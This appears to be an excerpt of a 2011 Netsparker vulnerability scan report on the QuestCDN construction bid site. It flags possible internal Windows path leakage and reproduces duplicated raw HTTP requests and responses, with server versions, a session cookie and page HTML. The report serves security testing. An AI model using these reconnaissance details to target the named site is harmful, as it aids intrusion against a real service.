Referer: http://qap.questcdn.com/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4576
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_add.html,v 1.4 2005/09/13 17:42:29 gkloke Exp $--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: Planholder</title> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script><script><!--var UserMsg = "";function showPlanList(){ //location = '/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=TRUE&jobPK=&providerPK='; location = '/qap/projects/planholder/planholder_list.html?modifiable=TRUE&jobPK=&providerPK='; return false;}function VerifyElectronicPlanHolderInfo(){ isValid = true; UserMsg = "";/* if ( isEmpty(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Please enter a bid amount"; isValid = false; } else {*/ if (!isNumber(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Bid amount must be in the form of 100.00"; isValid = false; }/* }*/ if ( isEmpty(document.UserInfo.designation.value) ) { UserMsg = UserMsg + "\n Please select a designation"; isValid = false; } return isValid;}function VerifyManualPlanHolder(){ isValid = true; UserMsg = ""; if ( isEmpty(document.UserInfo.company_name.value) ) { UserMsg = UserMsg + "\n Please enter a company name"; isValid = false; } if ( isEmpty(document.UserInfo.main_contact_name.value) ) { UserMsg = UserMsg + "\n Please enter a main contact name"; isValid = false; } if ( isEmpty(document.UserInfo.addr1.value) ) { UserMsg = UserMsg + "\n Please enter address line 1"; isValid = false; } if ( isEmpty(document.UserInfo.city.value) ) { UserMsg = UserMsg + "\n Please enter a city name"; isValid = false; } if ( isEmpty(document.UserInfo.state.value) ) { UserMsg = UserMsg + "\n Please enter a state"; isValid = false; } if ( isEmpty(document.UserInfo.zip.value) ) { UserMsg = UserMsg + "\n Please enter a zip code"; isValid = false; } if ( isEmpty(document.UserInfo.phone.value) ) { UserMsg = UserMsg + "\n Please enter a phone number"; isValid = false; } if ( !validateEmail(document.UserInfo.email.value, true) ) { UserMsg = UserMsg + "\n E-mail address is in an invalid format"; isValid = false; } if (!isNumber(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Bid amount must be in the form of 100.00"; isValid = false; } if ( isEmpty(document.UserInfo.designation.value) ) { UserMsg = UserMsg + "\n Please select a designation"; isValid = false; } if ( isEmpty(document.UserInfo.doc_type.value) ) { UserMsg = UserMsg + "\n Please select a document type"; isValid = false; } return isValid;}function UpdateElectronicPlanHolder(action){ if ( VerifyElectronicPlanHolderInfo() ) { document.UserInfo.submit(); } else { alert(UserMsg); }}function SaveManualPlanHolder(action){ if ( VerifyManualPlanHolder() ) { document.UserInfo.submit(); } else { alert(UserMsg); }}function SelectIndustryDir(action){ document.SelectIndustry.submit();}// --></script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D63A303'] = new Array(CSCallFunction,'UpdateElectronicPlanHolder','self');CSAct[/*CMP*/ 'B3D63A304'] = new Array(CSCallFunction,'SaveManualPlanHolder','self');CSAct[/*CMP*/ 'B3D63A3C5'] = new Array(CSCallFunction,'SelectIndustryDir','self');// --></script> </csactiondict> <csactions> <csaction name="B3D63A303" class="Call Function" type="ONEVENT" val0="UpdateElectronicPlanHolder" val1="self"> <csaction name="B3D63A304" class="Call Function" type="ONEVENT" val0="SaveManualPlanHolder" val1="self"> <csaction name="B3D63A3C4" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> <csaction name="B3D63A3C5" class="Call Function" type="ONEVENT" val0="SelectIndustryDir" val1="self"> </csactions> </head> <body bgcolor="white" > <form name="UserInfo" action="/qap/action/updatePlanHolder" method="post"> <input type="hidden" name="jobPK" value=""/> <input type="hidden" name="userPK" value=""/> <input type="hidden" name="PlanHoldersNO" value=""/> </form> </body></html>
Date: Tue, 01 Mar 2011 20:01:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4576
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_add.html,v 1.4 2005/09/13 17:42:29 gkloke Exp $--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: Planholder</title> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script><script><!--var UserMsg = "";function showPlanList(){ //location = '/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=TRUE&jobPK=&providerPK='; location = '/qap/projects/planholder/planholder_list.html?modifiable=TRUE&jobPK=&providerPK='; return false;}function VerifyElectronicPlanHolderInfo(){ isValid = true; UserMsg = "";/* if ( isEmpty(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Please enter a bid amount"; isValid = false; } else {*/ if (!isNumber(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Bid amount must be in the form of 100.00"; isValid = false; }/* }*/ if ( isEmpty(document.UserInfo.designation.value) ) { UserMsg = UserMsg + "\n Please select a designation"; isValid = false; } return isValid;}function VerifyManualPlanHolder(){ isValid = true; UserMsg = ""; if ( isEmpty(document.UserInfo.company_name.value) ) { UserMsg = UserMsg + "\n Please enter a company name"; isValid = false; } if ( isEmpty(document.UserInfo.main_contact_name.value) ) { UserMsg = UserMsg + "\n Please enter a main contact name"; isValid = false; } if ( isEmpty(document.UserInfo.addr1.value) ) { UserMsg = UserMsg + "\n Please enter address line 1"; isValid = false; } if ( isEmpty(document.UserInfo.city.value) ) { UserMsg = UserMsg + "\n Please enter a city name"; isValid = false; } if ( isEmpty(document.UserInfo.state.value) ) { UserMsg = UserMsg + "\n Please enter a state"; isValid = false; } if ( isEmpty(document.UserInfo.zip.value) ) { UserMsg = UserMsg + "\n Please enter a zip code"; isValid = false; } if ( isEmpty(document.UserInfo.phone.value) ) { UserMsg = UserMsg + "\n Please enter a phone number"; isValid = false; } if ( !validateEmail(document.UserInfo.email.value, true) ) { UserMsg = UserMsg + "\n E-mail address is in an invalid format"; isValid = false; } if (!isNumber(document.UserInfo.amount.value) ) { UserMsg = UserMsg + "\n Bid amount must be in the form of 100.00"; isValid = false; } if ( isEmpty(document.UserInfo.designation.value) ) { UserMsg = UserMsg + "\n Please select a designation"; isValid = false; } if ( isEmpty(document.UserInfo.doc_type.value) ) { UserMsg = UserMsg + "\n Please select a document type"; isValid = false; } return isValid;}function UpdateElectronicPlanHolder(action){ if ( VerifyElectronicPlanHolderInfo() ) { document.UserInfo.submit(); } else { alert(UserMsg); }}function SaveManualPlanHolder(action){ if ( VerifyManualPlanHolder() ) { document.UserInfo.submit(); } else { alert(UserMsg); }}function SelectIndustryDir(action){ document.SelectIndustry.submit();}// --></script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D63A303'] = new Array(CSCallFunction,'UpdateElectronicPlanHolder','self');CSAct[/*CMP*/ 'B3D63A304'] = new Array(CSCallFunction,'SaveManualPlanHolder','self');CSAct[/*CMP*/ 'B3D63A3C5'] = new Array(CSCallFunction,'SelectIndustryDir','self');// --></script> </csactiondict> <csactions> <csaction name="B3D63A303" class="Call Function" type="ONEVENT" val0="UpdateElectronicPlanHolder" val1="self"> <csaction name="B3D63A304" class="Call Function" type="ONEVENT" val0="SaveManualPlanHolder" val1="self"> <csaction name="B3D63A3C4" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> <csaction name="B3D63A3C5" class="Call Function" type="ONEVENT" val0="SelectIndustryDir" val1="self"> </csactions> </head> <body bgcolor="white" > <form name="UserInfo" action="/qap/action/updatePlanHolder" method="post"> <input type="hidden" name="jobPK" value=""/> <input type="hidden" name="userPK" value=""/> <input type="hidden" name="PlanHoldersNO" value=""/> </form> </body></html>
[Possible] Internal Path Leakage (Windows)
[Possible] Internal Path Leakage (Windows)
2
TOTAL
INFORMATION
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
- Error messages should be disabled.
- Remove this kind of sensitive data from the output.
External References
|
- /qap/projects/prj_browse/prj_view_plans.html
/qap/projects/prj_browse/prj_view_plans.html |
Identified Internal Path(s)
c:\work\questcdn\www\projects\prj_browse\prj_view_plans.html
Request
GET /qap/projects/prj_browse/prj_view_plans.html?jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7690
Content-Type: text/html;charset=utf-8
<!--$Header: c:\work\questcdn\www\projects\prj_browse\prj_view_plans.html, 17, 11/26/2006, Eric Nelsen$--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>Viewable Documents for Project # 1438657</title> <script language="javascript"><!--<!--function CSCloseWindow(action) { window.close()}var fdfWindowName = 'FDFDocument';var _fdfDoc = null;function CSShowFDF(fdfFileName){ var pdfPath = '/QuestDownloads/viewpdf/qapview'; var fdfDocWidth = 700; var fdfDocHeight = 500; var fdfPath; if(pdfPath.length > 0 && pdfPath.substr(pdfPath.length-1) != "/") pdfPath += "/"; fdfPath = pdfPath + fdfFileName; _fdfDoc = window.open(fdfPath,fdfWindowName, 'width=' + fdfDocWidth + ',height=' + fdfDocHeight + ',resizable=yes,status=yes');}function createLink(aDate, aNum, aSize, aFile, dest, destTitle){ var lPadding; var fdfBase = aFile.substr(0, aFile.length - 4); var fdfPath = ""; lPadding = 0; if(dest.length > 0) { fdfPath = (fdfBase + '.pdf'+ '#' + dest); lPadding = 10; } else { //fdfPath = aFile; fdfPath = (fdfBase + '.pdf'); } document.writeln('<tr height="10">'); document.writeln('<td width="10" height="10"></td>'); document.writeln('<td width="230" height="10" valign="top" style="padding-left:' + lPadding + '">'); document.writeln('<font size="2"><a href="" onclick="CSShowFDF(\'' + fdfPath + '\');return false;">' + destTitle + '</a></font>'); document.writeln('</td>'); document.writeln('<td width="50" height="10" valign="top">'); document.writeln('<font size="2"><span class="macsize">' + aDate + '</span></font>'); document.writeln('</td>'); document.writeln('<td width="100" height="10" valign="top">'); document.writeln('<div align="center">'); document.writeln('<font size="2"><span class="macsize">' + aNum + '</span></font>'); document.writeln('</div>'); document.writeln('</td>'); document.writeln('<td width="50" height="10" valign="top">'); document.writeln('<div align="center">'); document.writeln('<font size="2"><span class="macsize">' + aSize + '</span></font>'); document.writeln('</div>'); document.writeln('</td>'); document.writeln('</tr>'); // This places a gap between the links to help readability when a link wraps to the next line document.writeln('<tr height="5">'); document.writeln('<td colspan="5" height="5"></td>'); document.writeln('</tr>');}function downloadAddenda(action) { alert('Make change here!'); //document.pickAddendum.job_addendum_no.value = document.pickAddendum.addendumNo.value; //document.pickAddendum.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D8BE7E1'] = new Array(CSCallFunction,'CSCloseWindow','self');// --></script> </csactiondict> <csactions> <csaction name="B3D8BE7E1" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="pickAddendum" method="post"> <input type="hidden" name="download_type" value="addenda"> <input type="hidden" name="job_addendum_no" value=""> <input type="hidden" name="member_no" value=""> <table cool width="416" height="403" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="413" height="1"><spacer type="block" width="413" height="1"></td> </tr> <tr height="400"> <td width="1" height="400"><spacer type="block" width="1" height="400"></td> <td width="413" height="400" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="400"> <tr> <td width="40"></td> <td colspan="6"> <div align="left"> <table border="0" cellpadding="0" cellspacing="0" width="373"> <tr> <font face="Verdana" size="1">Select a link to view* the document.<p> When finished you may select another file to view, or click the DONE button to close this window.<p></font> </tr> <tr> <td width="160"></td> <td width="50"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </div> </td> </tr> <tr height="10"> <td width="10"></td> </tr> <tr> <td width="10"></td> <td colspan="4"> <B>Viewable documents for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b> </td> </tr> <tr height="10"> <td width="10"></td> <td width="230" height="10"> <div align="left"> <font face="Verdana" size="1"><span class="macsize"><b>Document Description</b></span></font> </div> </td> <td width="50" height="10"> <div align="left"> <font face="Verdana" size="1"><span class="macsize"><b>Date</b></span></font> </div> </td> <td width="100" height="10"> <div align="center"> <font face="Verdana" size="1"><span class="macsize"><b>Addenda #</b></span></font> </div> </td> <td width="50" height="10"> <div align="center"> <font face="Verdana" size="1"><span class="macsize"><b>Size</b></span></font> </div> </td> </tr> <script> createLink('01/24/2011','--','15.5 Mb','1438657.pdf', '','Project Plan'); </script> <tr height="10"> <td colspan="5"></td> </tr> <script> createLink('02/10/2011','1','.7 Mb','1438657a1.pdf','', 'Addendum ' + '1'); </script> <script> createLink('02/21/2011','2','.3 Mb','1438657a2.pdf','', 'Addendum ' + '2'); </script> <tr height="10"> <td colspan="6"></td> </tr> <tr> <td width="40"></td> <td colspan="6"> <div align="left"> <table border="0" cellpadding="0" cellspacing="0" width="373"> <tr> <td width="160"></td> <td width="50"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </div> </td> </tr> </table> </td> </tr> </table> <tr> <td> *Documents on this page are intended for on-line viewing only. They are disabled for printing or off-line viewing purposes. Use the Download Project PDF or Addenda buttons to acquire printable copies of these documents. </td </tr> </form> <table name="foo"> <tr> <td width="275"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table> </body></html>
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7690
Content-Type: text/html;charset=utf-8
<!--$Header: c:\work\questcdn\www\projects\prj_browse\prj_view_plans.html, 17, 11/26/2006, Eric Nelsen$--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>Viewable Documents for Project # 1438657</title> <script language="javascript"><!--<!--function CSCloseWindow(action) { window.close()}var fdfWindowName = 'FDFDocument';var _fdfDoc = null;function CSShowFDF(fdfFileName){ var pdfPath = '/QuestDownloads/viewpdf/qapview'; var fdfDocWidth = 700; var fdfDocHeight = 500; var fdfPath; if(pdfPath.length > 0 && pdfPath.substr(pdfPath.length-1) != "/") pdfPath += "/"; fdfPath = pdfPath + fdfFileName; _fdfDoc = window.open(fdfPath,fdfWindowName, 'width=' + fdfDocWidth + ',height=' + fdfDocHeight + ',resizable=yes,status=yes');}function createLink(aDate, aNum, aSize, aFile, dest, destTitle){ var lPadding; var fdfBase = aFile.substr(0, aFile.length - 4); var fdfPath = ""; lPadding = 0; if(dest.length > 0) { fdfPath = (fdfBase + '.pdf'+ '#' + dest); lPadding = 10; } else { //fdfPath = aFile; fdfPath = (fdfBase + '.pdf'); } document.writeln('<tr height="10">'); document.writeln('<td width="10" height="10"></td>'); document.writeln('<td width="230" height="10" valign="top" style="padding-left:' + lPadding + '">'); document.writeln('<font size="2"><a href="" onclick="CSShowFDF(\'' + fdfPath + '\');return false;">' + destTitle + '</a></font>'); document.writeln('</td>'); document.writeln('<td width="50" height="10" valign="top">'); document.writeln('<font size="2"><span class="macsize">' + aDate + '</span></font>'); document.writeln('</td>'); document.writeln('<td width="100" height="10" valign="top">'); document.writeln('<div align="center">'); document.writeln('<font size="2"><span class="macsize">' + aNum + '</span></font>'); document.writeln('</div>'); document.writeln('</td>'); document.writeln('<td width="50" height="10" valign="top">'); document.writeln('<div align="center">'); document.writeln('<font size="2"><span class="macsize">' + aSize + '</span></font>'); document.writeln('</div>'); document.writeln('</td>'); document.writeln('</tr>'); // This places a gap between the links to help readability when a link wraps to the next line document.writeln('<tr height="5">'); document.writeln('<td colspan="5" height="5"></td>'); document.writeln('</tr>');}function downloadAddenda(action) { alert('Make change here!'); //document.pickAddendum.job_addendum_no.value = document.pickAddendum.addendumNo.value; //document.pickAddendum.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D8BE7E1'] = new Array(CSCallFunction,'CSCloseWindow','self');// --></script> </csactiondict> <csactions> <csaction name="B3D8BE7E1" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="pickAddendum" method="post"> <input type="hidden" name="download_type" value="addenda"> <input type="hidden" name="job_addendum_no" value=""> <input type="hidden" name="member_no" value=""> <table cool width="416" height="403" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="413" height="1"><spacer type="block" width="413" height="1"></td> </tr> <tr height="400"> <td width="1" height="400"><spacer type="block" width="1" height="400"></td> <td width="413" height="400" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="400"> <tr> <td width="40"></td> <td colspan="6"> <div align="left"> <table border="0" cellpadding="0" cellspacing="0" width="373"> <tr> <font face="Verdana" size="1">Select a link to view* the document.<p> When finished you may select another file to view, or click the DONE button to close this window.<p></font> </tr> <tr> <td width="160"></td> <td width="50"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </div> </td> </tr> <tr height="10"> <td width="10"></td> </tr> <tr> <td width="10"></td> <td colspan="4"> <B>Viewable documents for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b> </td> </tr> <tr height="10"> <td width="10"></td> <td width="230" height="10"> <div align="left"> <font face="Verdana" size="1"><span class="macsize"><b>Document Description</b></span></font> </div> </td> <td width="50" height="10"> <div align="left"> <font face="Verdana" size="1"><span class="macsize"><b>Date</b></span></font> </div> </td> <td width="100" height="10"> <div align="center"> <font face="Verdana" size="1"><span class="macsize"><b>Addenda #</b></span></font> </div> </td> <td width="50" height="10"> <div align="center"> <font face="Verdana" size="1"><span class="macsize"><b>Size</b></span></font> </div> </td> </tr> <script> createLink('01/24/2011','--','15.5 Mb','1438657.pdf', '','Project Plan'); </script> <tr height="10"> <td colspan="5"></td> </tr> <script> createLink('02/10/2011','1','.7 Mb','1438657a1.pdf','', 'Addendum ' + '1'); </script> <script> createLink('02/21/2011','2','.3 Mb','1438657a2.pdf','', 'Addendum ' + '2'); </script> <tr height="10"> <td colspan="6"></td> </tr> <tr> <td width="40"></td> <td colspan="6"> <div align="left"> <table border="0" cellpadding="0" cellspacing="0" width="373"> <tr> <td width="160"></td> <td width="50"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </div> </td> </tr> </table> </td> </tr> </table> <tr> <td> *Documents on this page are intended for on-line viewing only. They are disabled for printing or off-line viewing purposes. Use the Download Project PDF or Addenda buttons to acquire printable copies of these documents. </td </tr> </form> <table name="foo"> <tr> <td width="275"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table> </body></html>
|
- /qap/projects/prj_browse/prj_view_notifications.html
/qap/projects/prj_browse/prj_view_notifications.html |
Identified Internal Path(s)
c:\work\questcdn\www\projects\prj_browse\prj_view_notifications.html
Request
GET /qap/projects/prj_browse/prj_view_notifications.html?jobNo=1438657 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2752
Content-Type: text/html;charset=utf-8
<!--$Header: c:\work\questcdn\www\projects\prj_browse\prj_view_notifications.html, 17, 11/26/2006, Eric Nelsen$--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: Addenda List</title> <script language="javascript"><!--<!--function CSCloseWindow(action) { window.close()}function downloadAddenda(action) { alert('Make change here!'); //document.pickAddendum.job_addendum_no.value = document.pickAddendum.addendumNo.value; //document.pickAddendum.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D8BE7E1'] = new Array(CSCallFunction,'CSCloseWindow','self');// --></script> </csactiondict> <csactions> <csaction name="B3D8BE7E1" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="pickAddendum" action="/qap/download" method="post"> <input type="hidden" name="download_type" value="addenda"> <input type="hidden" name="job_addendum_no" value=""> <input type="hidden" name="member_no" value=""> <table cool width="416" height="403" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="413" height="1"><spacer type="block" width="413" height="1"></td> </tr> <tr height="400"> <td width="1" height="400"><spacer type="block" width="1" height="400"></td> <td width="413" height="400" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="400"> <tr> <td width="10"></td> <B>Addenda notification list for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b></a> </tr> There are no addenda notifications to view. <tr> <td width="115"></td> <td width="50"></td> <td width="125"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </td> </tr> </table> </form> <table name="foo"> <tr> <td width="275"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table> </body></html>
Date: Tue, 01 Mar 2011 20:01:25 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:25 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2752
Content-Type: text/html;charset=utf-8
<!--$Header: c:\work\questcdn\www\projects\prj_browse\prj_view_notifications.html, 17, 11/26/2006, Eric Nelsen$--><html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <title>QUESTCDN: Addenda List</title> <script language="javascript"><!--<!--function CSCloseWindow(action) { window.close()}function downloadAddenda(action) { alert('Make change here!'); //document.pickAddendum.job_addendum_no.value = document.pickAddendum.addendumNo.value; //document.pickAddendum.submit();}// -->// --> </script> <csscriptdict import> <script language="JavaScript1.2" src="/qap/j_scripts/CSScriptLib.js"></script> </csscriptdict> <csactiondict> <script><!--CSAct[/*CMP*/ 'B3D8BE7E1'] = new Array(CSCallFunction,'CSCloseWindow','self');// --></script> </csactiondict> <csactions> <csaction name="B3D8BE7E1" class="Call Function" type="ONEVENT" val0="CSCloseWindow" val1="self"> </csactions> </head> <body bgcolor="white"> <form name="pickAddendum" action="/qap/download" method="post"> <input type="hidden" name="download_type" value="addenda"> <input type="hidden" name="job_addendum_no" value=""> <input type="hidden" name="member_no" value=""> <table cool width="416" height="403" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="413" height="1"><spacer type="block" width="413" height="1"></td> </tr> <tr height="400"> <td width="1" height="400"><spacer type="block" width="1" height="400"></td> <td width="413" height="400" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="400"> <tr> <td width="10"></td> <B>Addenda notification list for NDSWC Southwest Pipeline Project: OMND Regional Service Area, Center Elevated Tank, Contract 5-16 (Project #1438657)</b></a> </tr> There are no addenda notifications to view. <tr> <td width="115"></td> <td width="50"></td> <td width="125"></td> <td> <div align="right"> <a href="(Empty Reference!)" csclick="B3D8BE7E1" onclick="CSAction(new Array(/*CMP*/'B3D8BE7E1'));return CSClickReturn();"><img height="20" width="69" src="/qap/images/buttons/bu_done.gif" border="0"></a></div> </td> </tr> </table> </td> </tr> </table> </form> <table name="foo"> <tr> <td width="275"><font size="1" face="Verdana">© 1999-2010 Quest Construction Data Network, LLC</font></td> </tr> </table> </body></html>